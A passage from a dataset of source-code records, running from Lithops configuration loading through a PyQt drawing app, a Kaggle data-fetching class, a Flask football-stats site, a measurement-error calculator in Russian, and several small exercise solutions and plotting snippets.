'LITHOPS_CONFIG_FILE' in os.environ:\n config_filename = os.environ['LITHOPS_CONFIG_FILE']\n\n elif os.path.exists(\".lithops_config\"):\n config_filename = os.path.abspath('.lithops_config')\n\n else:\n config_filename = constants.CONFIG_FILE\n if not os.path.exists(config_filename):\n config_filename = os.path.join(constants.HOME_DIR, '.lithops_config')\n if not os.path.exists(config_filename):\n return None\n\n logging.warning('~/.lithops_config is deprecated. Please move your'\n ' configuration file into ~/.lithops/config')\n\n logger.info('Getting configuration from {}'.format(config_filename))\n\n return config_filename\n\n\ndef default_config(config_data=None, config_overwrite={}):\n \"\"\"\n First checks .lithops_config\n then checks LITHOPS_CONFIG_FILE environment variable\n then ~/.lithops/config\n \"\"\"\n logger.info('Lithops v{}'.format(__version__))\n logger.debug(\"Loading configuration\")\n\n if not config_data:\n if 'LITHOPS_CONFIG' in os.environ:\n config_data = json.loads(os.environ.get('LITHOPS_CONFIG'))\n else:\n config_filename = get_default_config_filename()\n if config_filename:\n config_data = load_yaml_config(config_filename)\n else:\n logger.debug(\"No config file found. Running on Localhost mode\")\n config_data = {'lithops': {'mode': constants.LOCALHOST}}\n\n if 'lithops' not in config_data:\n config_data['lithops'] = {}\n\n if 'executor' in config_data['lithops']:\n logging.warning(\"'executor' key in lithopos section is deprecated, use 'mode' key instead\")\n config_data['lithops']['mode'] = config_data['lithops']['executor']\n\n # overwrite values provided by the user\n if 'lithops' in config_overwrite:\n config_data['lithops'].update(config_overwrite['lithops'])\n\n if constants.LOCALHOST in config_overwrite:\n if constants.LOCALHOST not in config_data or \\\n config_data[constants.LOCALHOST] is None:\n config_data[constants.LOCALHOST] = {}\n config_data[constants.LOCALHOST].update(config_overwrite[constants.LOCALHOST])\n\n if constants.SERVERLESS in config_overwrite:\n if constants.SERVERLESS not in config_data or \\\n config_data[constants.SERVERLESS] is None:\n config_data[constants.SERVERLESS] = {}\n config_data[constants.SERVERLESS].update(config_overwrite[constants.SERVERLESS])\n\n if constants.STANDALONE in config_overwrite:\n if constants.STANDALONE not in config_data or \\\n config_data[constants.STANDALONE] is None:\n config_data[constants.STANDALONE] = {}\n config_data[constants.STANDALONE].update(config_overwrite[constants.STANDALONE])\n\n if 'mode' not in config_data['lithops']:\n config_data['lithops']['mode'] = constants.MODE_DEFAULT\n if 'execution_timeout' not in config_data['lithops']:\n config_data['lithops']['execution_timeout'] = constants.EXECUTION_TIMEOUT_DEFAULT\n\n if config_data['lithops']['mode'] == constants.SERVERLESS:\n if 'storage_bucket' not in config_data['lithops']:\n raise Exception(\"storage_bucket is mandatory in \"\n \"lithops section of the configuration\")\n\n if constants.SERVERLESS not in config_data or \\\n config_data[constants.SERVERLESS] is None:\n config_data[constants.SERVERLESS] = {}\n\n if 'backend' not in config_data[constants.SERVERLESS]:\n config_data[constants.SERVERLESS]['backend'] = constants.SERVERLESS_BACKEND_DEFAULT\n\n sb = config_data[constants.SERVERLESS]['backend']\n logger.debug(\"Loading Serverless backend module: {}\".format(sb))\n cb_config = importlib.import_module('lithops.serverless.backends.{}.config'.format(sb))\n cb_config.load_config(config_data)\n\n verify_runtime_name(config_data[constants.SERVERLESS]['runtime'])\n\n elif config_data['lithops']['mode'] == constants.STANDALONE:\n if 'storage_bucket' not in config_data['lithops']:\n raise Exception(\"storage_bucket is mandatory in \"\n \"lithops section of the configuration\")\n\n if constants.STANDALONE not in config_data or \\\n config_data[constants.STANDALONE] is None:\n config_data[constants.STANDALONE] = {}\n\n if 'auto_dismantle' not in config_data[constants.STANDALONE]:\n config_data[constants.STANDALONE]['auto_dismantle'] = constants.STANDALONE_AUTO_DISMANTLE_DEFAULT\n if 'soft_dismantle_timeout' not in config_data[constants.STANDALONE]:\n config_data[constants.STANDALONE]['soft_dismantle_timeout'] = constants.STANDALONE_SOFT_DISMANTLE_TIMEOUT_DEFAULT\n if 'hard_dismantle_timeout' not in config_data[constants.STANDALONE]:\n config_data[constants.STANDALONE]['hard_dismantle_timeout'] = constants.STANDALONE_HARD_DISMANTLE_TIMEOUT_DEFAULT\n if 'backend' not in config_data[constants.STANDALONE]:\n config_data[constants.STANDALONE]['backend'] = constants.STANDALONE_BACKEND_DEFAULT\n if 'runtime' not in config_data[constants.STANDALONE]:\n config_data[constants.STANDALONE]['runtime'] = constants.STANDALONE_RUNTIME_DEFAULT\n\n sb = config_data['standalone']['backend']\n logger.debug(\"Loading Standalone backend module: {}\".format(sb))\n sb_config = importlib.import_module('lithops.standalone.backends.{}.config'.format(sb))\n sb_config.load_config(config_data)\n\n verify_runtime_name(config_data[constants.STANDALONE]['runtime'])\n\n elif config_data['lithops']['mode'] == constants.LOCALHOST:\n if 'storage' not in config_data['lithops']:\n config_data['lithops']['storage'] = 'localhost'\n config_data['lithops']['storage_bucket'] = 'storage'\n\n if 'workers' not in config_data['lithops']:\n config_data['lithops']['workers'] = mp.cpu_count()\n\n if constants.LOCALHOST not in config_data or \\\n config_data[constants.LOCALHOST] is None:\n config_data[constants.LOCALHOST] = {}\n\n if 'runtime' not in config_data[constants.LOCALHOST]:\n config_data[constants.LOCALHOST]['runtime'] = constants.LOCALHOST_RUNTIME_DEFAULT\n\n verify_runtime_name(config_data[constants.LOCALHOST]['runtime'])\n\n if 'storage' not in config_data['lithops']:\n config_data['lithops']['storage'] = constants.STORAGE_BACKEND_DEFAULT\n sb = config_data['lithops']['storage']\n logger.debug(\"Loading Storage backend module: {}\".format(sb))\n sb_config = importlib.import_module('lithops.storage.backends.{}.config'.format(sb))\n sb_config.load_config(config_data)\n\n return config_data\n\n\ndef extract_storage_config(config):\n storage_config = {}\n sb = config['lithops']['storage']\n storage_config['backend'] = sb\n storage_config['bucket'] = config['lithops']['storage_bucket']\n storage_config[sb] = config[sb]\n storage_config[sb]['user_agent'] = 'lithops/{}'.format(__version__)\n\n if 'storage_region' in config['lithops']:\n storage_config[sb]['region'] = config['lithops']['storage_region']\n\n return storage_config\n\n\ndef extract_localhost_config(config):\n localhost_config = config[constants.LOCALHOST].copy()\n\n return localhost_config\n\n\ndef extract_serverless_config(config):\n serverless_config = config[constants.SERVERLESS].copy()\n sb = config[constants.SERVERLESS]['backend']\n serverless_config[sb] = config[sb]\n serverless_config[sb]['user_agent'] = 'lithops/{}'.format(__version__)\n\n if 'region' in config[constants.SERVERLESS]:\n serverless_config[sb]['region'] = config[constants.SERVERLESS]['region']\n\n return serverless_config\n\n\ndef extract_standalone_config(config):\n standalone_config = config[constants.STANDALONE].copy()\n sb = config[constants.STANDALONE]['backend']\n standalone_config[sb] = config[sb]\n standalone_config[sb]['user_agent'] = 'lithops/{}'.format(__version__)\n\n if 'region' in config[constants.STANDALONE]:\n standalone_config[sb]['region'] = config[constants.STANDALONE]['region']\n\n return standalone_config\n","sub_path":"lithops/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":9751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"510771865","text":"import sys\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtWidgets import QApplication, QMainWindow\nfrom PyQt5.QtGui import QPainter, QPen\nfrom PyQt5.QtCore import Qt\n\nfrom random import randint\n\n\nclass Ui_MainWindow(object):\n def setupUi(self, MainWindow):\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(1080, 720)\n MainWindow.setStyleSheet(\"\")\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setObjectName(\"centralwidget\")\n self.pushButton = QtWidgets.QPushButton(self.centralwidget)\n self.pushButton.setGeometry(QtCore.QRect(440, 580, 201, 81))\n font = QtGui.QFont()\n font.setPointSize(12)\n self.pushButton.setFont(font)\n self.pushButton.setStyleSheet(\"background-color: white;\")\n self.pushButton.setObjectName(\"pushButton\")\n MainWindow.setCentralWidget(self.centralwidget)\n self.menubar = QtWidgets.QMenuBar(MainWindow)\n self.menubar.setGeometry(QtCore.QRect(0, 0, 1080, 26))\n self.menubar.setObjectName(\"menubar\")\n MainWindow.setMenuBar(self.menubar)\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName(\"statusbar\")\n MainWindow.setStatusBar(self.statusbar)\n\n self.retranslateUi(MainWindow)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n def retranslateUi(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"MainWindow\"))\n self.pushButton.setText(_translate(\"MainWindow\", \"Создать окружность\"))\n\n\nclass MyWidget(QMainWindow, Ui_MainWindow):\n def __init__(self):\n super().__init__()\n self.setupUi(self)\n self.pushButton.clicked.connect(self.make)\n self.check = False\n self.colors = [Qt.yellow, Qt.red, Qt.white, Qt.black, Qt.blue, Qt.darkBlue, Qt.cyan, Qt.green]\n\n def make(self):\n self.check = True\n self.update()\n\n def paintEvent(self, event):\n if self.check:\n painter = QPainter(self)\n painter.setPen(QPen(self.colors[randint(0, 7)], 15, Qt.SolidLine))\n n = randint(200, 500)\n painter.drawEllipse(640 - int(n / 2) - 100, 310 - int(n / 2), n, n)\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = MyWidget()\n ex.show()\n sys.exit(app.exec_())\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"101769913","text":"# Definition for singly-linked list.\nclass ListNode(object):\n def __init__(self, x):\n self.val = x\n self.next = None\n \n def __repr__(self):\n if self:\n return \"{} -> {}\".format(self.val, repr(self.next))\n\n#class Solution(object):\n# def partition(self, head, x):\n# \"\"\"\n# :type head: ListNode\n# :type x: int\n# :rtype: ListNode\n# \"\"\"\n# # two new lists\n# lessDummy,greaterDummy=ListNode(-1),ListNode(-1)\n# less,greater=lessDummy,greaterDummy\n# \n# while head:\n# if head.val= 1024:\n M = kb / 1024\n if M >= 1024:\n G = M / 1024\n return \"%.2fG\" % (G)\n else:\n return \"%.2fM\" % (M)\n elif kb == 0:\n return 'Folder vacio'\n else:\n return \"%.2fkb\" % (kb)\n\n\n#%%\n def check_path(self,path_check):\n '''\n Valida que exista el path\n\n Returns\n -------\n None.\n\n '''\n self.dir_exist = os.path.exists(path_check)\n \n#%%\n def get_lst_files(self,path_data,tipo):\n '''\n Lista los archivo de un directorio segun el tipo de solicitado.\n\n Parameters\n ----------\n path_data : string\n Ruta del directorio que contiene los archivos.\n tipo : string\n Extensión o tipo de archivo.\n\n Returns\n -------\n None.\n\n '''\n try:\n self.lst_files = [f for f in glob.glob(str(path_data)+'/**/*.'+ tipo.lower(), recursive=True)]\n \n except Exception as exc:\n self.show_error(exc)\n \n \n#%% \n # Carga datos desde archivos tipo CSV\n def get_data_csv(self, the_path):\n '''\n Parameters\n ----------\n the_path : TYPE\n DESCRIPTION.\n\n Returns\n -------\n None.\n\n '''\n\n try:\n self.data = pd.read_csv(the_path)\n \n except Exception as exc:\n self.show_error(exc)\n\n#%% \n def get_data_csv_nozip(self, the_path):\n '''\n Obtiene un archivo de datos en CSV sin comprimir\n \n Parameters\n ----------\n the_path : TYPE\n DESCRIPTION.\n\n Returns\n -------\n None.\n\n '''\n\n try:\n with open(the_path, 'rb') as fx:\n result = chardet.detect(fx.read())\n \n child = os.path.splitext(os.path.basename(the_path))[0]\n print('File: {} - {}'.format(child,result))\n self.data = pd.read_csv(the_path\n )\n \n except Exception as exc:\n self.show_error(exc)\n\n\n########################################\n## Métodos de Kaggle (fuente de datos) #\n########################################\n\n#%%\n \n def list_competition_kaggle(self,competition):\n '''\n Listar \"competencias\" de Kaggle que contengan una cadena\n \n '''\n try:\n self.lst_competition = self.api.competitions_list(search=competition)\n print('{}Competition: *{}*'.format(os.linesep,competition))\n [print('-->',c) for c in self.lst_competition]\n \n except Exception as exc:\n self.show_error(exc)\n\n#%% \n def list_files_competition_kaggle(self):\n try:\n self.lst_files_c = self.api.competition_list_files(self.competition)\n print('{}Datasets in: {}'.format(os.linesep,self.competition))\n [print('-->',c) for c in self.lst_files_c]\n \n except Exception as exc:\n self.show_error(exc)\n\n#%% \n def get_data_from_kaggle_c(self,path_kaggle_files):\n try:\n self.api.competition_download_file(self.competition, \n self.dataset,\n path_kaggle_files,\n force=True,\n quiet=False)\n \n except Exception as exc:\n self.show_error(exc)\n\n\n\n#%%\n\n def list_dataset_kaggle(self,dataset, show = False):\n try:\n self.ds = {}\n self.lst_datasets = self.api.datasets_list(search=dataset)\n print('{}Datasets about: *{}*'.format(os.linesep,dataset))\n \n for x in self.lst_datasets:\n self.ds[x['title']] = x['ref']\n \n if show:\n for x in self.lst_datasets:\n print(x['title'])\n pp = pprint.PrettyPrinter(depth=50)\n pp.pprint(x)\n break\n \n except Exception as exc:\n self.show_error(exc)\n\n#%% \n def show_kaggle_datasets(self):\n try:\n for x,y in self.ds.items():\n print('-- {} ---> {}'.format(x,y))\n \n except Exception as exc:\n self.show_error(exc)\n\n#%% \n def get_data_from_kaggle_d(self,path_kaggle_files,dataset_name):\n try:\n self.api.dataset_download_files(dataset_name, \n path_kaggle_files,\n unzip=True,\n quiet=False\n )\n \n except Exception as exc:\n self.show_error(exc)\n\n#%%\n # Control de excepciones\n def show_error(self,ex):\n '''\n Captura el tipo de error, su description y localización.\n\n Parameters\n ----------\n ex : Object\n Exception generada por el sistema.\n\n Returns\n -------\n None.\n\n '''\n trace = []\n tb = ex.__traceback__\n while tb is not None:\n trace.append({\n \"filename\": tb.tb_frame.f_code.co_filename,\n \"name\": tb.tb_frame.f_code.co_name,\n \"lineno\": tb.tb_lineno\n })\n \n tb = tb.tb_next\n \n print('{}Something went wrong:'.format(os.linesep))\n print('---type:{}'.format(str(type(ex).__name__)))\n print('---message:{}'.format(str(type(ex))))\n print('---trace:{}'.format(str(trace)))\n \n#%% \n def muestra_archivos(self):\n '''\n Imprime en pantalla cada uno de los elementos contenidos en lst_files\n\n Returns\n -------\n None.\n\n '''\n try:\n for f in self.lst_files:\n child = os.path.splitext(os.path.basename(f))[0]\n print(child)\n \n except Exception as exc:\n self.show_error(exc)\n \n#%% \n def save_df(self,df,filename = None):\n try:\n if filename is not None:\n df.to_excel(filename , sheet_name = 'sheet', index=False)\n \n except Exception as exc:\n self.show_error(exc)\n \n\n\n","sub_path":"clases/cls_extract_data_mf.py","file_name":"cls_extract_data_mf.py","file_ext":"py","file_size_in_byte":9709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"476956227","text":"#! /usr/bin/env python\n# sample script for processing phase using LP methods\n# usage : mdv_to_cfradial.py filename.mdv outdir site_deseg\n\nimport sys\nimport os\nfrom time import time\n\nimport netCDF4\n\nfrom pyart.io import py_mdv, radar\nfrom pyart.io import nc_utils\n\n\ndef dt_to_dict(dt, **kwargs):\n pref = kwargs.get('pref', '')\n return dict([(pref + key, getattr(dt, key)) for key in\n ['year', 'month', 'day', 'hour', 'minute', 'second']])\n\n\nif __name__ == \"__main__\":\n\n # read in the command line arguments\n filename = sys.argv[1]\n outdir = sys.argv[2]\n site_deseg = sys.argv[3]\n\n # read in the mdv file\n my_mdv_object = py_mdv.read_mdv(filename, debug=True)\n myradar = radar.Radar(my_mdv_object)\n\n mydatetime = netCDF4.num2date(\n myradar.time['data'][0], myradar.time['units'],\n calendar=myradar.time['calendar']) # append a datetime object\n mydict = dt_to_dict(mydatetime)\n mydict.update(\n {'scanmode': {'ppi': 'sur', 'rhi': 'rhi'}[myradar.sweep_mode[0]],\n 'site_deseg': site_deseg})\n ofilename = outdir + '%(scanmode)scmac%(site_deseg)s.a1.%(year)04d%(month)02d%(day)02d.%(hour)02d%(minute)02d%(second)02d.nc' % mydict\n netcdf_obj = netCDF4.Dataset(ofilename, 'w', format='NETCDF4')\n nc_utils.write_radar4(netcdf_obj, myradar)\n netcdf_obj.close()\n","sub_path":"examples/mdv_to_cfradial.py","file_name":"mdv_to_cfradial.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"552807389","text":"#-----------------------------------------\n# mainfile.py\n# creating first flask application\n#-----------------------------------------\nfrom flask import Flask, render_template, request, redirect\n#from flask_restless import APIManager\nfrom flask_sqlalchemy import SQLAlchemy\nfrom models import app, db, Player, Teams, Weeks\nimport flask_whooshalchemy as wa\nimport os\nimport requests\nimport subprocess\nimport platform\n\nwa.whoosh_index(app, Player)\n\n@app.route('/')\ndef index():\n return render_template('splash.html')\n \n# search function\n@app.route('/search/')\n@app.route('/splash/search')\ndef search():\n searches = Player.query.whoosh_search(request.args.get('query')).all()\n if not searches:\n searches = None\n return render_template('search.html', searches=searches)\n \n# Navigates to weeks page\n@app.route('/weeks/')\ndef weeks():\n week = db.session.query(Weeks).all()\n newList = []\n newList2 = []\n for i in range(0,(len(week)+1)):\n if i == len(week):\n break\n if len(newList2) == 2:\n newList.append(newList2)\n newList2 = []\n if len(newList2) < 2:\n newList2.append(week[i])\n newList2.append(week[-2])\n newList2.append(week[-1])\n newList.append(newList2)\n return render_template('weeks.html' , week = newList) \n \n# Navigates to players page\n@app.route('/players/')\ndef players():\n players_ = db.session.query(Player).all()\n newDict = {}\n for i in players_:\n if i.pos in newDict:\n newDict[i.pos].append(i)\n else:\n newDict[i.pos] = [i]\n return render_template('players.html', playerss = newDict)\n\n# Navigates to ind player's page\n@app.route('/brady/')\ndef brady(player_id):\n players_ = db.session.query(Player).filter_by(id = player_id).first()\n return render_template('brady.html', player = players_)\n\n# Navigates to teams page\n@app.route('/teams/')\ndef teams():\n team = db.session.query(Teams).all()\n return render_template('teams.html', team = team)\n\n# Navigates to Patriots page\n@app.route('/teampage/')\ndef teampage(team_name):\n team = db.session.query(Teams).filter_by(team = team_name).first()\n qb = db.session.query(Player).filter_by(pos = \"QB\").first()\n return render_template('teampage.html', team = team, qb = qb)\n\n#Navigates to about page\n@app.route('/about/')\ndef about():\n return render_template('about.html')\n \n# Navigates to game page\n@app.route('/game/')\ndef game(team_name):\n game = db.session.query(Weeks).all()\n newList = []\n newList2 = []\n for i in game:\n if len(newList2) == 2:\n newList.append(newList2)\n newList2 = []\n if len(newList2) <= 2:\n newList2.append(i)\n newList2.append(game[-2])\n newList2.append(game[-1])\n newList.append(newList2)\n for k in newList:\n if (k[0].team == team_name) or (k[1].team == team_name):\n game = k\n return render_template('gamepage.html', game = game)\n \n# Navigates to Home/Splash page\n@app.route('/splash/')\ndef splash():\n return render_template('splash.html')\n \n# Navigates to unit test page\n@app.route('/test/')\ndef test():\n# Checks to see if the OS is Windows/Linux system\n if platform.system() == 'Windows':\n process = subprocess.Popen([\"python\", \"-m\", \"coverage\", \"run\", \"--branch\", \"test.py\"],\n stdout=subprocess.PIPE,\n\t\t\t\t\t\t\t stderr=subprocess.PIPE,\n\t\t\t\t\t\t\t stdin=subprocess.PIPE)\n\n else:\n process = subprocess.Popen([\"python3\", \"-m\", \"coverage\", \"run\", \"--branch\", \"test.py\"],\n stdout=subprocess.PIPE,\n\t\t\t\t\t\t\t stderr=subprocess.PIPE,\n\t\t\t\t\t\t\t stdin=subprocess.PIPE)\n\n out, err = process.communicate()\n output=err+out\n output = output.decode(\"utf-8\")\n return render_template('test.html', output = \"\\n\".join(output.split(\"\\n\")))\n\n\nif __name__ == \"__main__\":\n app.run()\n\n","sub_path":"mainfile.py","file_name":"mainfile.py","file_ext":"py","file_size_in_byte":3747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"467253514","text":"\n# Коэффициенты (N = 3,4,5)\nTPN = [4.3, 3.2, 2.8] # Значения коэффициентов Стьюдента tP, N в зависимости от числа наблюдений N при доверительной вероятности Р = 95 %:\nUPN = [0.94, 0.76, 0.64] # Коэффициенты uP, N для проверки результатов наблюдений на наличие грубых погрешностей в зависимости от объема выборки N для доверительной вероятности Р = 95 %:\nBPN = [1.30, 0.72, 0.51] # Коэффициенты βP, N для расчета доверительной погрешности по размаху выборки для числа наблюдений N доверительной вероятности Р = 95 %:\nSHIFT = 3\n\ndef string_to_func(string):\n '''\n Перевод строки в лямбда-функцию\n string - строка, содержащая описание функции в виде:\n f(variables) = rule\n Пример:\n f(x,y,z) = x*y*z\n '''\n string = string.replace('f', \"lambda\")\n string = string.replace('(', ' ')\n string = string.replace(')', ' ')\n string = string.replace('=', ':')\n return eval(string)\n\ndef partial_derivative(f, variable, params):\n '''\n Нахождение частной производной f по variable когда переменные = params\n f - функция\n variable - номер переменной, по которой будем дифференцировать\n params - значения параметров\n '''\n delta = 0.0000001\n f1 = \"\"\n f2 = \"\"\n for i in range(len(params)):\n if i == variable and i != len(params) - 1:\n f1 += \"params[\" + str(i) + \"] \" + \"+ delta, \"\n f2 += \"params[\" + str(i) + \"] \" + \"- delta, \"\n elif i == variable and i == len(params) - 1:\n f1 += \"params[\" + str(i) + \"] \" + \"+ delta)\"\n f2 += \"params[\" + str(i) + \"] \" + \"- delta)\"\n elif i == len(params) - 1:\n f1 += \"params[\" + str(i) + \"])\"\n f2 += \"params[\" + str(i) + \"])\"\n else:\n f1 += \"params[\" + str(i) + \"], \"\n f2 += \"params[\" + str(i) + \"], \"\n\n derivative = \"(f(\" + f1 + \"-f(\" + f2 +\")/(2*delta)\"\n return eval(derivative)\n\ndef print_results(R, mean, random_error, random_range_error, SKO, SKOS, complete_error, relative_error):\n '''\n Вывод всех вычисленных значений\n '''\n print('\\nРазмах = ' + str(R))\n print('Среднее значение = ' + str(mean))\n print('СКО = ' + str(SKO))\n print('СКОС = ' + str(SKOS))\n print('Случайная погрешность (по Стьюденту) = ' + str(random_error))\n print('Случайная погрешность (по размаху) = ' + str(random_range_error))\n print('Полная погрешность = ' + str(complete_error))\n print('Относительная погрешность = ' + str(relative_error))\n print('Истинное значение = ' + str(mean) + ' ± ' + str(complete_error) + \"\\n\")\n\n\ndef direct(meterage, instrumental_error, type = 0):\n '''\n Вычисления погрешности для прямых измерений.\n meterage - выборка\n instrumental_error - инструментальная погрешность\n type - тип вызова функции:\n 0 - для прямых измерений\n 1 - для косвенных измерений\n '''\n meterages_num = len(meterage) # Количество измерений\n upn = UPN[meterages_num - SHIFT]\n tpn = TPN[meterages_num - SHIFT]\n bpn = TPN[meterages_num - SHIFT]\n meterage = sorted(meterage) # Упорядочиваем в порядке возрастания\n mean = sum(meterage)/meterages_num #Среднее арифмитическое результатов измерений\n R = meterage[meterages_num-1] - meterage[0] # Размах выборки\n\n #Проверка на наличие промахов\n for i in range(meterages_num - 1):\n if (meterage[i+1]-meterage[i])/2 > upn:\n print(\"Выборка содержит промахи\")\n\n # Считаем СКО и СКОС\n summ = 0\n for i in range(meterages_num):\n summ += (meterage[i] - mean)*(meterage[i] - mean)\n\n SKO = (summ/(meterages_num-1))**0.5\n SKOS = (summ/((meterages_num-1)*meterages_num))**0.5\n\n random_error = tpn*SKOS # Случайная погрешность\n random_range_error = bpn*R # Случайная погрешность по размаху\n\n complete_error = (random_error*random_error + instrumental_error*instrumental_error)**0.5 # Полная погрешность\n relative_error = (complete_error/mean)*100 # Относительная погрешность\n print_results(R, mean, random_error, random_range_error, SKO, SKOS, complete_error, relative_error)\n if type == 1:\n return mean, complete_error\n\ndef indirect(func, args_num):\n '''\n Вычисления погрешности для косвенных измерений.\n func - функция\n args_num - количество переменных в функции\n '''\n mean = [0]*args_num\n complete_error = [0]*args_num\n\n for a in range(args_num):\n meterage = []\n meterages_num = 0\n while (meterages_num < 3 and meterages_num > 5):\n meterages_num = int(input(\"Введите количество измерений: \"))\n\n # Ввод результатов измерений\n for i in range(meterages_num):\n meterage.append(float(input('Введите результат измерения ' + str(i + 1) + ' : ')))\n\n instrumental_error = float(input(\"Введите значение инструментальной погрешности (половина цены деления или указанно на приборе): \"))\n\n mean[a], complete_error[a] = direct(meterage, instrumental_error, type = 1)\n\n func = string_to_func(func)\n mean_func = \"func(\"\n for i in range(args_num - 1):\n mean_func += \"mean[\" + str(i) + '], '\n mean_func += \"mean[\" + str(args_num - 1) + '])'\n mean_func = eval(mean_func)\n print(\"Среднее заначение функции = \", mean_func)\n\n derivatives = []\n for i in range(args_num):\n derivatives.append(partial_derivative(func, i, mean))\n print(str(i+1) + \"частная производная = \", derivatives[i])\n\n complete_error_function = \"(\"\n for i in range(args_num - 1):\n complete_error_function += \"(derivatives[\" + str(i) +\"]*complete_error[\" + str(i) + '])**2 +'\n complete_error_function += \"(derivatives[\" + str(args_num - 1) +\"]*complete_error[\" + str(args_num - 1) + '])**2)**0.5'\n complete_error_function = eval(complete_error_function)\n print('Полная погрешность функции = ', complete_error_function)\n print('Истинное значение функции = ' + str(mean_func) + '±' + str(complete_error_function))\n\ndef main():\n choice = int(input(\"Для прямых измерений напишите 0,для косвенных - 1 \"))\n if choice == 0:\n meterages_number = 0\n while (meterages_number < 3 or meterages_number > 5):\n meterages_number = int(input(\"Введите количество измерений: \"))\n meterage = []\n\n #Ввод результатов измерений\n for i in range(meterages_number):\n meterage.append(float(input('Введите результат измерения ' + str(i+1) + ' : ')))\n\n #Приборная погрешнос��ь\n instrumental_error = float(input(\"Введите значение инструментальной погрешности (половина цены деления или указанно на приборе): \"))\n direct(meterage, instrumental_error)\n else:\n function = input(\"Введите функцию в виде f(x1,x2..xn) = ...: \")\n num = int(input(\"Введите количество переменных в функции: \"))\n print(\"Вводите параметры в том порядке, который вы указали в функции\")\n indirect(function, num)\n\nif __name__ == '__main__':\n main()\n","sub_path":"Code.py","file_name":"Code.py","file_ext":"py","file_size_in_byte":8686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"611111281","text":"import a1\nimport unittest\n\n\nclass TestNumBuses(unittest.TestCase):\n \"\"\" Test class for function a1.num_buses. \"\"\"\n\n # Add your test methods for a1.num_buses here.\n def test_Num_Buses_exm_1(self):\n ''' test num_buses method for zero value '''\n actual = a1.num_buses(0)\n expected = 0\n self.assertEqual(expected, actual)\n\n def test_Num_Buses_exm_2(self):\n ''' test num_buses method for minimum non zero value '''\n actual = a1.num_buses(1)\n expected = 1\n self.assertEqual(expected, actual)\n\n def test_Num_Buses_exm_3(self):\n ''' test num_buses method for thresold point value '''\n actual = a1.num_buses(50)\n expected = 1\n self.assertEqual(expected, actual)\n \n def test_Num_Buses_exm_4(self):\n ''' test num_buses method for break point value '''\n actual = a1.num_buses(51)\n expected = 2\n self.assertEqual(expected, actual)\n \n def test_Num_Buses_exm_5(self):\n ''' test num_buses method for large value '''\n actual = a1.num_buses(160)\n expected = 4\n self.assertEqual(expected, actual)\n\n \n\nif __name__ == '__main__':\n unittest.main(exit=False)\n","sub_path":"codes/week 2/test_num_buses.py","file_name":"test_num_buses.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"159797946","text":"'''\nGiven a positive integer n, return the number of the integers in the range [0, n] whose binary representations do not contain consecutive ones.\n\n \n\nExample 1:\n\nInput: n = 5\nOutput: 5\nExplanation:\nHere are the non-negative integers <= 5 with their corresponding binary representations:\n0 : 0\n1 : 1\n2 : 10\n3 : 11\n4 : 100\n5 : 101\nAmong them, only integer 3 disobeys the rule (two consecutive ones) and the other 5 satisfy the rule. \nExample 2:\n\nInput: n = 1\nOutput: 2\nExample 3:\n\nInput: n = 2\nOutput: 3\n \n\nConstraints:\n\n1 <= n <= 109\n'''\n\nclass Solution:\n def findIntegers(self, n: int) -> int:\n x, y = 1, 2\n sol = 0\n n += 1\n while n:\n if n & 1 and n & 2:\n sol = 0\n sol += x * (n & 1)\n n >>= 1\n x, y = y, x + y\n \n return sol\n \n","sub_path":"problems/600_non_negative_integers_without_consecutive_ones.py","file_name":"600_non_negative_integers_without_consecutive_ones.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"554187320","text":"with open('alienin.txt') as file:\n _, WIDTH = (int(i) - 1 for i in file.readline().split())\n PEOPLE_POSITIONS = set(int(i) + 1 for i in file)\n FURTHEST = max(PEOPLE_POSITIONS)\n\n\ndef count(leftPos, rightPos):\n result = 0\n for i in range(leftPos, rightPos + 1):\n if i in PEOPLE_POSITIONS:\n result += 1\n return result\n\nanswer = 0\n\nleft = 1\nright = left + WIDTH\ncurCount = count(left, right)\nmaxCount = curCount\nwhile right < FURTHEST:\n right += 1\n if right in PEOPLE_POSITIONS:\n curCount += 1\n\n left += 1\n if left - 1 in PEOPLE_POSITIONS:\n curCount -= 1\n\n maxCount = max(maxCount, curCount)\n\nanswer = maxCount\n\nwith open('alienout.txt', 'w') as file:\n file.write(str(answer))\n # print(answer)\n","sub_path":"AIOC/AIC&AIO/2011/Alien/alien.py","file_name":"alien.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"235470260","text":"import os, sys\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nplt.plot([1,5,6,8,4,6,7,30,1,2,6,4,9,8,1])\nplt.savefig(\"Lecture16_01.png\",transparent=True)\nplt.show()\n\nnumbers =[1,5,6,8,4,6,7,3,1,2,6,4,9,8,1]\nplt.plot(numbers, color=\"green\")\nplt.savefig(\"Lecture16_02.png\",transparent=True)\nplt.show()\n\nnumbers =[1,5,6,8,4,6,7,3,1,2,6,4,9,8,1]\nplt.plot(numbers, color=\"red\", label=\"My numbers\")\nplt.legend(loc='upper 